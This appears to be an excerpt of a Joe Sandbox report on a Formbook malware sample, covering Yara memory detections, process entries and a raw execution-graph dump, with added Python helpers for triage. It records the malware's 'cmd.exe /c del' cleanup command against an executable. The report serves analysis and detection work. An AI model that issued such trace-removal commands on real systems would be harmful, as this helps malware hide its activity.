                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate
                                            Has exited:false
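The fifteen Yara hits above are five rules firing on three separate memory regions of the same process. For triage it helps to regroup them by region and to check how many independent signature authors agree on each one. The following Python is an added helper written for this page, not part of Joe Sandbox or its report; the sample input is the Target ID 4 match list copied from above. It assumes (this is an interpretation, not documented on the page) that the first dot-separated field of the `.sdmp` source name is the target id and the fourth is the region base address, which is consistent with the values shown (target 4, bases 0x4A70000, 0x2E50000, 0x4AA0000).

```python
import re
from collections import defaultdict

# Constructed sample: the Yara match bullets for Target ID 4 as listed in the report.
YARA_LINES = """
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
"""

# One match bullet: "Rule: X, Description: Y, Source: Z.sdmp, Author: W".
MATCH_RE = re.compile(
    r"Rule:\s*(?P<rule>[^,]+),\s*Description:\s*(?P<desc>.*?),\s*"
    r"Source:\s*(?P<source>[^,\s]+),\s*Author:\s*(?P<author>.+)$"
)


def parse_yara_matches(text):
    """Turn the bullet list into records with target id and region base decoded."""
    matches = []
    for line in text.splitlines():
        m = MATCH_RE.search(line)
        if not m:
            continue
        rec = m.groupdict()
        # Assumption: field 0 of the dump name is the target id, field 3 the region base.
        fields = rec["source"].removesuffix(".sdmp").split(".")
        rec["target_id"] = int(fields[0], 16)
        rec["region_base"] = int(fields[3], 16)
        matches.append(rec)
    return matches


def rules_per_region(matches):
    """Map region base address -> set of rule names that fired on it."""
    out = defaultdict(set)
    for r in matches:
        out[r["region_base"]].add(r["rule"])
    return dict(out)


def corroborated_regions(matches, min_authors=2):
    """Regions flagged by at least min_authors distinct, named signature authors.
    'unknown' authorship is not counted as an independent source."""
    authors = defaultdict(set)
    for r in matches:
        author = r["author"].strip()
        if author.lower() != "unknown":
            authors[r["region_base"]].add(author)
    return sorted(base for base, a in authors.items() if len(a) >= min_authors)


if __name__ == "__main__":
    ms = parse_yara_matches(YARA_LINES)
    for base, rules in sorted(rules_per_region(ms).items()):
        print(f"0x{base:X}: {len(rules)} rules {sorted(rules)}")
    print("corroborated:", [hex(b) for b in corroborated_regions(ms, min_authors=3)])
```

The three regions that every named author agrees on are the ones to pull from the memory dumps first; a region hit by a single vendor rule only would be a lower-priority candidate.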

                                            Target ID:5
                                            Start time:11:25:23
                                            Start date:03/07/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                            Imagebase:0xc50000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:6
                                            Start time:11:25:23
                                            Start date:03/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff70f010000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true
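The two short-lived processes above are a `cmd.exe /c del "..."` launched from SysWOW64 and its console host. A `cmd.exe /c del` against an executable is a cleanup pattern worth flagging in any process tree, while the `conhost.exe 0xffffffff -ForceV1` entry is the ordinary console host that accompanies a console process and carries no signal on its own. The Python below is an added example for this page, not Joe Sandbox code; it parses the report's `Key:Value` target blocks (the sample text is the Target 5 and 6 entries copied from above) and returns the deletion targets. Note that the report lists Target 5 as not elevated, and whether the delete succeeded is not shown in this section.

```python
import re

# Constructed sample: the Target ID 5 and 6 blocks as printed in the report.
PROCESS_TEXT = r"""
Target ID:5
Start time:11:25:23
Start date:03/07/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
Imagebase:0xc50000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Has exited:true

Target ID:6
Start time:11:25:23
Start date:03/07/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70f010000
Has elevated privileges:false
Has exited:true
"""

# "del <path>" or 'del "<path>"' at the end of a command line.
DEL_RE = re.compile(r'(?i)\bdel\b\s+"?(?P<target>[^"]+?)"?\s*$')


def parse_targets(text):
    """Split the report text into one dict per 'Target ID' block.
    Only the first colon separates key from value, so times and paths survive."""
    targets, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        key, sep, val = line.partition(":")
        if not sep:
            continue
        if key == "Target ID":
            cur = {"Target ID": int(val)}
            targets.append(cur)
        elif cur is not None:
            cur[key] = val
    return targets


def flag_cleanup_commands(targets):
    """Return (target id, deleted path) for every cmd.exe '/c del' entry."""
    flagged = []
    for t in targets:
        path = t.get("Path", "").lower()
        cmd = t.get("Commandline", "")
        if not path.endswith("\\cmd.exe") or "/c" not in cmd.lower():
            continue
        m = DEL_RE.search(cmd)
        if m:
            flagged.append((t["Target ID"], m.group("target")))
    return flagged


def severity(target_path):
    """Rough priority: deleting an executable under the Windows directory ranks highest."""
    p = target_path.lower()
    if p.endswith(".exe") and "\\windows\\" in p:
        return "high"
    if p.endswith(".exe"):
        return "medium"
    return "low"


if __name__ == "__main__":
    for tid, target in flag_cleanup_commands(parse_targets(PROCESS_TEXT)):
        elevated = next(t for t in parse_targets(PROCESS_TEXT) if t["Target ID"] == tid)
        print(f"target {tid}: del {target} [{severity(target)}] "
              f"elevated={elevated.get('Has elevated privileges')}")
```

The same parser works on any run of these `Target ID` blocks, so it can be pointed at a full process list to pull out every self-delete or cleanup command rather than just this one.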


                                              Execution Graph

                                              Execution Coverage:4%
                                              Dynamic/Decrypted Code Coverage:1.5%
                                              Signature Coverage:6.6%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:164
execution_graph: the raw node/edge dump that followed here is residue from the interactive graph viewer and is omitted. What it records: the entry path runs through CRT start-up (GetStartupInfoW, GetCommandLineW, GetEnvironmentStringsW, TlsAlloc, heap and critical-section setup, SetUnhandledExceptionFilter/UnhandledExceptionFilter, GetCurrentProcess/TerminateProcess on failure) into the program's own routines, which reach RegOpenKeyExW/RegQueryValueExW/RegCloseKey, GetModuleFileNameW, GetFullPathNameW, GetCurrentDirectoryW/SetCurrentDirectoryW, IsDebuggerPresent (with a MessageBoxA branch), AllocateAndInitializeSid/CheckTokenMembership/FreeSid, LoadLibraryA/LoadLibraryExW/GetProcAddress/FreeLibrary, FindResourceExW/LoadResource/SizeofResource/LockResource, CreateStreamOnHGlobal, GetOpenFileNameW, IsThemeActive, SystemParametersInfoW, LoadImageW/EnumResourceNamesW, RegisterClassExW/CreateWindowExW/ShowWindow, GetSystemTimeAsFileTime and CreateFileW/GetFileType/ReadFile/GetConsoleMode. Node labels also name CRT helpers such as __write_nolock, _memmove, __wsetenvp, __calloc_crt, __lock and ___raise_securityfailure.
108d34 58 API calls __getptd_noexit 99285->99363 99292 1117f0 99286->99292 99293 1112e3 99286->99293 99287->99286 99296 1112f5 99287->99296 99289 111300 99288->99289 99290 1112b4 99288->99290 99289->99283 99290->99289 99294 1112ba ReadConsoleW 99290->99294 99370 108d68 58 API calls __getptd_noexit 99292->99370 99303 1112e9 99293->99303 99365 108d47 58 API calls 3 library calls 99293->99365 99294->99296 99297 1112dd GetLastError 99294->99297 99296->99303 99304 11135a 99296->99304 99305 1115c7 99296->99305 99297->99293 99299 1117f5 99371 108d34 58 API calls __getptd_noexit 99299->99371 99301->99240 99302 102f95 _free 58 API calls 99302->99301 99303->99301 99303->99302 99307 1113c6 ReadFile 99304->99307 99314 111447 99304->99314 99305->99303 99311 1116cd ReadFile 99305->99311 99308 1113e7 GetLastError 99307->99308 99316 1113f1 99307->99316 99308->99316 99309 111504 99319 1114b4 MultiByteToWideChar 99309->99319 99368 111b11 60 API calls 3 library calls 99309->99368 99310 1114f4 99367 108d68 58 API calls __getptd_noexit 99310->99367 99312 1116f0 GetLastError 99311->99312 99313 1116fe 99311->99313 99312->99313 99313->99305 99369 111b11 60 API calls 3 library calls 99313->99369 99314->99303 99314->99309 99314->99310 99314->99319 99316->99304 99366 111b11 60 API calls 3 library calls 99316->99366 99319->99297 99319->99303 99322 110e02 99321->99322 99326 110e17 99321->99326 99408 108d68 58 API calls __getptd_noexit 99322->99408 99324 110e07 99409 108ff6 9 API calls __fclose_nolock 99324->99409 99327 110e4c 99326->99327 99334 110e12 99326->99334 99410 116234 58 API calls __malloc_crt 99326->99410 99329 104916 __fclose_nolock 58 API calls 99327->99329 99330 110e60 99329->99330 99375 110f97 99330->99375 99332 110e67 99333 104916 __fclose_nolock 58 API calls 99332->99333 99332->99334 99335 110e8a 99333->99335 99334->99240 99335->99334 99336 104916 __fclose_nolock 58 API calls 99335->99336 99337 110e96 99336->99337 99337->99334 99338 104916 __fclose_nolock 58 API calls 
99337->99338 99339 110ea3 99338->99339 99340 104916 __fclose_nolock 58 API calls 99339->99340 99340->99334 99341->99233 99342->99235 99343->99240 99344->99233 99345->99250 99346->99252 99348 115ed3 99347->99348 99349 115ec6 99347->99349 99352 115edf 99348->99352 99353 108d68 __fclose_nolock 58 API calls 99348->99353 99350 108d68 __fclose_nolock 58 API calls 99349->99350 99351 115ecb 99350->99351 99351->99281 99352->99281 99354 115f00 99353->99354 99355 108ff6 __fclose_nolock 9 API calls 99354->99355 99355->99351 99356->99259 99357->99301 99358->99267 99359->99266 99360->99267 99361->99277 99362->99285 99363->99301 99364->99276 99365->99303 99366->99316 99367->99303 99368->99319 99369->99313 99370->99299 99371->99303 99372->99261 99373->99266 99374->99301 99376 110fa3 __alloc_osfhnd 99375->99376 99377 110fb0 99376->99377 99378 110fc7 99376->99378 99379 108d34 __write_nolock 58 API calls 99377->99379 99380 11108b 99378->99380 99383 110fdb 99378->99383 99382 110fb5 99379->99382 99381 108d34 __write_nolock 58 API calls 99380->99381 99384 110ffe 99381->99384 99385 108d68 __fclose_nolock 58 API calls 99382->99385 99386 111006 99383->99386 99387 110ff9 99383->99387 99394 108d68 __fclose_nolock 58 API calls 99384->99394 99390 110fbc __alloc_osfhnd 99385->99390 99388 111013 99386->99388 99389 111028 99386->99389 99391 108d34 __write_nolock 58 API calls 99387->99391 99392 108d34 __write_nolock 58 API calls 99388->99392 99393 10d446 ___lock_fhandle 59 API calls 99389->99393 99390->99332 99391->99384 99395 111018 99392->99395 99396 11102e 99393->99396 99397 111020 99394->99397 99398 108d68 __fclose_nolock 58 API calls 99395->99398 99399 111041 99396->99399 99400 111054 99396->99400 99402 108ff6 __fclose_nolock 9 API calls 99397->99402 99398->99397 99401 1110ab __read_nolock 70 API calls 99399->99401 99403 108d68 __fclose_nolock 58 API calls 99400->99403 99404 11104d 99401->99404 99402->99390 99405 111059 99403->99405 99407 111083 __read LeaveCriticalSection 99404->99407 99406 
108d34 __write_nolock 58 API calls 99405->99406 99406->99404 99407->99390 99408->99324 99409->99334 99410->99327 99414 10543a GetSystemTimeAsFileTime 99411->99414 99413 1491f8 99413->99006 99415 105468 __aulldiv 99414->99415 99415->99413 99417 105e9c __alloc_osfhnd 99416->99417 99418 105ec3 99417->99418 99419 105eae 99417->99419 99421 106e4e __lock_file 59 API calls 99418->99421 99430 108d68 58 API calls __getptd_noexit 99419->99430 99423 105ec9 99421->99423 99422 105eb3 99431 108ff6 9 API calls __fclose_nolock 99422->99431 99432 105b00 67 API calls 5 library calls 99423->99432 99426 105ed4 99433 105ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 99426->99433 99428 105ee6 99429 105ebe __alloc_osfhnd 99428->99429 99429->99010 99430->99422 99431->99429 99432->99426 99433->99428 99434->98873 99435->98882 99436->98895 99437->98897 99438->98893 99439->98903 99441 e92c9 Mailbox 99440->99441 99442 11f5c8 99441->99442 99447 e92d3 99441->99447 99443 100ff6 Mailbox 59 API calls 99442->99443 99446 11f5d4 99443->99446 99444 e92da 99444->98907 99446->99446 99447->99444 99448 e9df0 59 API calls Mailbox 99447->99448 99448->99447 99449->98918 99450->98915 99454 1499d2 __tzset_nolock _wcscmp 99451->99454 99452 149393 GetSystemTimeAsFileTime 99452->99454 99453 e506b 74 API calls 99453->99454 99454->99452 99454->99453 99455 149866 99454->99455 99456 e5045 85 API calls 99454->99456 99455->98924 99455->98952 99456->99454 99458 148d9b 99457->99458 99460 148da9 99457->99460 99459 10548b 115 API calls 99458->99459 99459->99460 99461 148dee 99460->99461 99462 10548b 115 API calls 99460->99462 99484 148db2 99460->99484 99488 14901b 99461->99488 99464 148dd3 99462->99464 99464->99461 99466 148ddc 99464->99466 99465 148e32 99467 148e36 99465->99467 99468 148e57 99465->99468 99469 1055d6 __fcloseall 83 API calls 99466->99469 99466->99484 99471 148e43 99467->99471 99473 1055d6 __fcloseall 83 API calls 99467->99473 99492 148c33 99468->99492 99469->99484 99476 1055d6 __fcloseall 83 API 
calls 99471->99476 99471->99484 99473->99471 99474 148e85 99501 148eb5 99474->99501 99475 148e65 99477 148e72 99475->99477 99479 1055d6 __fcloseall 83 API calls 99475->99479 99476->99484 99482 1055d6 __fcloseall 83 API calls 99477->99482 99477->99484 99479->99477 99482->99484 99484->98953 99485 148ea0 99485->99484 99487 1055d6 __fcloseall 83 API calls 99485->99487 99487->99484 99489 149040 99488->99489 99491 149029 __tzset_nolock _memmove 99488->99491 99490 105812 __fread_nolock 74 API calls 99489->99490 99490->99491 99491->99465 99493 10594c __malloc_crt 58 API calls 99492->99493 99494 148c42 99493->99494 99495 10594c __malloc_crt 58 API calls 99494->99495 99496 148c56 99495->99496 99497 10594c __malloc_crt 58 API calls 99496->99497 99498 148c6a 99497->99498 99499 148f97 58 API calls 99498->99499 99500 148c7d 99498->99500 99499->99500 99500->99474 99500->99475 99508 148eca 99501->99508 99502 148f82 99534 1491bf 99502->99534 99504 148c8f 74 API calls 99504->99508 99505 148e8c 99509 148f97 99505->99509 99508->99502 99508->99504 99508->99505 99530 14909c 99508->99530 99538 148d2b 74 API calls 99508->99538 99510 148fa4 99509->99510 99511 148faa 99509->99511 99513 102f95 _free 58 API calls 99510->99513 99512 148fbb 99511->99512 99514 102f95 _free 58 API calls 99511->99514 99515 148e93 99512->99515 99516 102f95 _free 58 API calls 99512->99516 99513->99511 99514->99512 99515->99485 99517 1055d6 99515->99517 99516->99515 99518 1055e2 __alloc_osfhnd 99517->99518 99519 1055f6 99518->99519 99520 10560e 99518->99520 99587 108d68 58 API calls __getptd_noexit 99519->99587 99523 106e4e __lock_file 59 API calls 99520->99523 99526 105606 __alloc_osfhnd 99520->99526 99522 1055fb 99588 108ff6 9 API calls __fclose_nolock 99522->99588 99525 105620 99523->99525 99571 10556a 99525->99571 99526->99485 99531 1490ab 99530->99531 99532 1490eb 99530->99532 99531->99508 99532->99531 99539 149172 99532->99539 99535 1491cc 99534->99535 99537 1491dd 99534->99537 99536 104a93 80 API calls 
99535->99536 99536->99537 99537->99505 99538->99508 99540 14919e 99539->99540 99541 1491af 99539->99541 99543 104a93 99540->99543 99541->99532 99544 104a9f __alloc_osfhnd 99543->99544 99545 104ad5 99544->99545 99546 104abd 99544->99546 99548 104acd __alloc_osfhnd 99544->99548 99549 106e4e __lock_file 59 API calls 99545->99549 99568 108d68 58 API calls __getptd_noexit 99546->99568 99548->99541 99550 104adb 99549->99550 99556 10493a 99550->99556 99551 104ac2 99569 108ff6 9 API calls __fclose_nolock 99551->99569 99557 104967 99556->99557 99559 104949 99556->99559 99570 104b0d LeaveCriticalSection LeaveCriticalSection __wfsopen 99557->99570 99558 104957 99560 108d68 __fclose_nolock 58 API calls 99558->99560 99559->99557 99559->99558 99562 104981 _memmove 99559->99562 99561 10495c 99560->99561 99563 108ff6 __fclose_nolock 9 API calls 99561->99563 99562->99557 99564 10b05e __flsbuf 78 API calls 99562->99564 99565 104c6d __flush 78 API calls 99562->99565 99566 104916 __fclose_nolock 58 API calls 99562->99566 99567 10dac6 __write 78 API calls 99562->99567 99563->99557 99564->99562 99565->99562 99566->99562 99567->99562 99568->99551 99569->99548 99570->99548 99572 105579 99571->99572 99573 10558d 99571->99573 99626 108d68 58 API calls __getptd_noexit 99572->99626 99579 105589 99573->99579 99590 104c6d 99573->99590 99575 10557e 99627 108ff6 9 API calls __fclose_nolock 99575->99627 99589 105645 LeaveCriticalSection LeaveCriticalSection __wfsopen 99579->99589 99582 104916 __fclose_nolock 58 API calls 99583 1055a7 99582->99583 99600 110c52 99583->99600 99585 1055ad 99585->99579 99586 102f95 _free 58 API calls 99585->99586 99586->99579 99587->99522 99588->99526 99589->99526 99591 104c80 99590->99591 99592 104ca4 99590->99592 99591->99592 99593 104916 __fclose_nolock 58 API calls 99591->99593 99596 110dc7 99592->99596 99594 104c9d 99593->99594 99628 10dac6 99594->99628 99597 1055a1 99596->99597 99598 110dd4 99596->99598 99597->99582 99598->99597 99599 102f95 _free 58 API calls 
99598->99599 99599->99597 99601 110c5e __alloc_osfhnd 99600->99601 99602 110c82 99601->99602 99603 110c6b 99601->99603 99605 110d0d 99602->99605 99607 110c92 99602->99607 99753 108d34 58 API calls __getptd_noexit 99603->99753 99758 108d34 58 API calls __getptd_noexit 99605->99758 99606 110c70 99754 108d68 58 API calls __getptd_noexit 99606->99754 99610 110cb0 99607->99610 99611 110cba 99607->99611 99755 108d34 58 API calls __getptd_noexit 99610->99755 99614 10d446 ___lock_fhandle 59 API calls 99611->99614 99612 110cb5 99759 108d68 58 API calls __getptd_noexit 99612->99759 99616 110cc0 99614->99616 99618 110cd3 99616->99618 99619 110cde 99616->99619 99617 110d19 99760 108ff6 9 API calls __fclose_nolock 99617->99760 99738 110d2d 99618->99738 99756 108d68 58 API calls __getptd_noexit 99619->99756 99621 110c77 __alloc_osfhnd 99621->99585 99624 110cd9 99757 110d05 LeaveCriticalSection __unlock_fhandle 99624->99757 99626->99575 99627->99579 99629 10dad2 __alloc_osfhnd 99628->99629 99630 10daf6 99629->99630 99631 10dadf 99629->99631 99632 10db95 99630->99632 99634 10db0a 99630->99634 99729 108d34 58 API calls __getptd_noexit 99631->99729 99735 108d34 58 API calls __getptd_noexit 99632->99735 99638 10db32 99634->99638 99639 10db28 99634->99639 99636 10dae4 99730 108d68 58 API calls __getptd_noexit 99636->99730 99656 10d446 99638->99656 99731 108d34 58 API calls __getptd_noexit 99639->99731 99640 10db2d 99736 108d68 58 API calls __getptd_noexit 99640->99736 99641 10daeb __alloc_osfhnd 99641->99592 99644 10db38 99646 10db4b 99644->99646 99647 10db5e 99644->99647 99665 10dbb5 99646->99665 99732 108d68 58 API calls __getptd_noexit 99647->99732 99648 10dba1 99737 108ff6 9 API calls __fclose_nolock 99648->99737 99652 10db63 99733 108d34 58 API calls __getptd_noexit 99652->99733 99654 10db57 99734 10db8d LeaveCriticalSection __unlock_fhandle 99654->99734 99657 10d452 __alloc_osfhnd 99656->99657 99658 10d4a1 EnterCriticalSection 99657->99658 99660 109e4b __lock 58 API calls 
99657->99660 99659 10d4c7 __alloc_osfhnd 99658->99659 99659->99644 99661 10d477 99660->99661 99662 10d48f 99661->99662 99664 10a06b __alloc_osfhnd InitializeCriticalSectionAndSpinCount 99661->99664 99663 10d4cb ___lock_fhandle LeaveCriticalSection 99662->99663 99663->99658 99664->99662 99666 10dbc2 __write_nolock 99665->99666 99667 10dc20 99666->99667 99668 10dc01 99666->99668 99698 10dbf6 99666->99698 99671 10dc78 99667->99671 99672 10dc5c 99667->99672 99670 108d34 __write_nolock 58 API calls 99668->99670 99669 10c836 __woutput_l 6 API calls 99673 10e416 99669->99673 99674 10dc06 99670->99674 99676 10dc91 99671->99676 99680 111b11 __lseeki64_nolock 60 API calls 99671->99680 99675 108d34 __write_nolock 58 API calls 99672->99675 99673->99654 99677 108d68 __fclose_nolock 58 API calls 99674->99677 99679 10dc61 99675->99679 99678 115ebb __write_nolock 58 API calls 99676->99678 99681 10dc0d 99677->99681 99682 10dc9f 99678->99682 99683 108d68 __fclose_nolock 58 API calls 99679->99683 99680->99676 99684 108ff6 __fclose_nolock 9 API calls 99681->99684 99685 10dff8 99682->99685 99690 109bec ____lc_codepage_func 58 API calls 99682->99690 99686 10dc68 99683->99686 99684->99698 99687 10e016 99685->99687 99688 10e38b WriteFile 99685->99688 99689 108ff6 __fclose_nolock 9 API calls 99686->99689 99691 10e13a 99687->99691 99700 10e02c 99687->99700 99692 10dfeb GetLastError 99688->99692 99697 10dfb8 99688->99697 99689->99698 99693 10dccb GetConsoleMode 99690->99693 99704 10e22f 99691->99704 99706 10e145 99691->99706 99692->99697 99693->99685 99695 10dd0a 99693->99695 99694 10e3c4 99696 108d68 __fclose_nolock 58 API calls 99694->99696 99694->99698 99695->99685 99699 10dd1a GetConsoleCP 99695->99699 99702 10e3f2 99696->99702 99697->99694 99697->99698 99703 10e118 99697->99703 99698->99669 99699->99694 99723 10dd49 99699->99723 99700->99694 99701 10e09b WriteFile 99700->99701 99701->99692 99705 10e0d8 99701->99705 99707 108d34 __write_nolock 58 API calls 99702->99707 99708 10e123 
99703->99708 99709 10e3bb 99703->99709 99704->99694 99710 10e2a4 WideCharToMultiByte 99704->99710 99705->99700 99711 10e0fc 99705->99711 99706->99694 99712 10e1aa WriteFile 99706->99712 99707->99698 99714 108d68 __fclose_nolock 58 API calls 99708->99714 99715 108d47 __dosmaperr 58 API calls 99709->99715 99710->99692 99721 10e2eb 99710->99721 99711->99697 99712->99692 99713 10e1f9 99712->99713 99713->99697 99713->99706 99713->99711 99716 10e128 99714->99716 99715->99698 99719 108d34 __write_nolock 58 API calls 99716->99719 99717 10e2f3 WriteFile 99718 10e346 GetLastError 99717->99718 99717->99721 99718->99721 99719->99698 99720 103835 __write_nolock 58 API calls 99720->99723 99721->99697 99721->99704 99721->99711 99721->99717 99722 10de9f 99722->99692 99722->99697 99722->99723 99727 117cae WriteConsoleW CreateFileW __putwch_nolock 99722->99727 99728 10dec7 WriteFile 99722->99728 99723->99697 99723->99720 99723->99722 99724 11650a 60 API calls __write_nolock 99723->99724 99725 10de32 WideCharToMultiByte 99723->99725 99724->99723 99725->99697 99726 10de6d WriteFile 99725->99726 99726->99692 99726->99722 99727->99722 99728->99692 99728->99722 99729->99636 99730->99641 99731->99640 99732->99652 99733->99654 99734->99641 99735->99640 99736->99648 99737->99641 99761 10d703 99738->99761 99740 110d91 99774 10d67d 59 API calls 2 library calls 99740->99774 99741 110d3b 99741->99740 99743 110d6f 99741->99743 99744 10d703 __close_nolock 58 API calls 99741->99744 99743->99740 99745 10d703 __close_nolock 58 API calls 99743->99745 99747 110d66 99744->99747 99748 110d7b FindCloseChangeNotification 99745->99748 99746 110d99 99749 110dbb 99746->99749 99775 108d47 58 API calls 3 library calls 99746->99775 99750 10d703 __close_nolock 58 API calls 99747->99750 99748->99740 99751 110d87 GetLastError 99748->99751 99749->99624 99750->99743 99751->99740 99753->99606 99754->99621 99755->99612 99756->99624 99757->99621 99758->99612 99759->99617 99760->99621 99762 10d723 99761->99762 99763 
10d70e 99761->99763 99765 108d34 __write_nolock 58 API calls 99762->99765 99767 10d748 99762->99767 99764 108d34 __write_nolock 58 API calls 99763->99764 99766 10d713 99764->99766 99768 10d752 99765->99768 99769 108d68 __fclose_nolock 58 API calls 99766->99769 99767->99741 99770 108d68 __fclose_nolock 58 API calls 99768->99770 99771 10d71b 99769->99771 99772 10d75a 99770->99772 99771->99741 99773 108ff6 __fclose_nolock 9 API calls 99772->99773 99773->99771 99774->99746 99775->99749 99777 1009e2 __write_nolock 99776->99777 99778 1009f1 GetLongPathNameW 99777->99778 99779 e7d2c 59 API calls 99778->99779 99780 e741d 99779->99780 99781 e716b 99780->99781 99782 e77c7 59 API calls 99781->99782 99783 e717d 99782->99783 99784 e48ae 60 API calls 99783->99784 99785 e7188 99784->99785 99786 e7193 99785->99786 99787 11ecae 99785->99787 99788 e3f84 59 API calls 99786->99788 99792 11ecc8 99787->99792 99834 e7a68 61 API calls 99787->99834 99790 e719f 99788->99790 99828 e34c2 99790->99828 99793 e71b2 Mailbox 99793->98707 99795 e4f3d 136 API calls 99794->99795 99796 e69ef 99795->99796 99797 11e45a 99796->99797 99798 e4f3d 136 API calls 99796->99798 99799 1497e5 122 API calls 99797->99799 99800 e6a03 99798->99800 99801 11e46f 99799->99801 99800->99797 99802 e6a0b 99800->99802 99803 11e490 99801->99803 99804 11e473 99801->99804 99806 e6a17 99802->99806 99807 11e47b 99802->99807 99805 100ff6 Mailbox 59 API calls 99803->99805 99808 e4faa 84 API calls 99804->99808 99825 11e4d5 Mailbox 99805->99825 99835 e6bec 99806->99835 99928 144534 90 API calls _wprintf 99807->99928 99808->99807 99812 11e489 99812->99803 99813 11e689 99814 102f95 _free 58 API calls 99813->99814 99815 11e691 99814->99815 99816 e4faa 84 API calls 99815->99816 99821 11e69a 99816->99821 99820 102f95 _free 58 API calls 99820->99821 99821->99820 99822 e4faa 84 API calls 99821->99822 99934 13fcb1 89 API calls 4 library calls 99821->99934 99822->99821 99824 e7f41 59 API calls 99824->99825 99825->99813 99825->99821 
99825->99824 99929 13fc4d 59 API calls 2 library calls 99825->99929 99930 13fb6e 61 API calls 2 library calls 99825->99930 99931 147621 59 API calls Mailbox 99825->99931 99932 e766f 59 API calls 2 library calls 99825->99932 99933 e74bd 59 API calls Mailbox 99825->99933 99829 e34d4 99828->99829 99833 e34f3 _memmove 99828->99833 99832 100ff6 Mailbox 59 API calls 99829->99832 99830 100ff6 Mailbox 59 API calls 99831 e350a 99830->99831 99831->99793 99832->99833 99833->99830 99834->99787 99836 11e847 99835->99836 99837 e6c15 99835->99837 100026 13fcb1 89 API calls 4 library calls 99836->100026 99940 e5906 60 API calls Mailbox 99837->99940 99840 e6c37 99941 e5956 99840->99941 99841 11e85a 100027 13fcb1 89 API calls 4 library calls 99841->100027 99845 e6c54 99847 e77c7 59 API calls 99845->99847 99846 11e876 99849 e6cc1 99846->99849 99848 e6c60 99847->99848 99954 100b9b 60 API calls __write_nolock 99848->99954 99851 e6ccf 99849->99851 99852 11e889 99849->99852 99855 e77c7 59 API calls 99851->99855 99854 e5dcf CloseHandle 99852->99854 99853 e6c6c 99856 e77c7 59 API calls 99853->99856 99858 11e895 99854->99858 99859 e6cd8 99855->99859 99857 e6c78 99856->99857 99860 e48ae 60 API calls 99857->99860 99861 e4f3d 136 API calls 99858->99861 99862 e77c7 59 API calls 99859->99862 99863 e6c86 99860->99863 99864 11e8b1 99861->99864 99865 e6ce1 99862->99865 99955 e59b0 ReadFile SetFilePointerEx 99863->99955 99867 11e8da 99864->99867 99870 1497e5 122 API calls 99864->99870 99964 e46f9 99865->99964 100028 13fcb1 89 API calls 4 library calls 99867->100028 99869 e6cb2 99956 e5c4e 99869->99956 99875 11e8cd 